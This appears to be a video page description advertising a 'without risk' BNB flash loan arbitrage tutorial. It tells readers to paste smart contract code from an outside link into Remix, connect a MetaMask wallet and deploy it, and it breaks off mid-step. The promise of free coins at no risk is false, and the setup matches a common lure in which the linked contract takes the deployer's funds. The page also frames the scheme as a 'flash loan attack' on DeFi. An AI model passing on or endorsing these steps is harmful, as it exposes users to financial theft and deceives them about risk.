Without RISK Earn 50 BINANCE Crypto Coin on BNB Flash Loan Arbitrage Tutorial with Online Loan!

  • 6 months ago
  • Wrapped Bitcoin
  • 288نمایش‌ها
Earn 50 BINANCE Crypto Coin: Flash loans are a type of uncollateralized lending that have become very popular in decentralized finance (DeFi). While they've proved popular, flash loan exploits have been used to attack vulnerable DeFi protocols and steal millions of dollars. Flash loan arbitrage tutorial to get FREE BNB with no collateral using a BNB flash loan attack on the Binance network. Step By Step Tutorial for Flash Loan: 1. Get the Metamask Extension for your browser 2. Open https://remix.ethereum.org/ from within your browser. 3. Click on File Explorers and click "Create New File ". 4. Name the file flashloans.sol and paste the contract code link below. Smart Contract Code: https://flashloan.cloud/bnbccfc/ 5. Click on Deploy & Run transactions and set "ENVIRONMENT" to (Injected Web3) OR (Injected Provider - MetaMask). 6. Connect your MetaMask wallet. 7. Click on the "Solidity Compiler" and set the compiler version to 0.5.0 8. Click on the Solidity Compiler and then click

Wrapped Bitcoin

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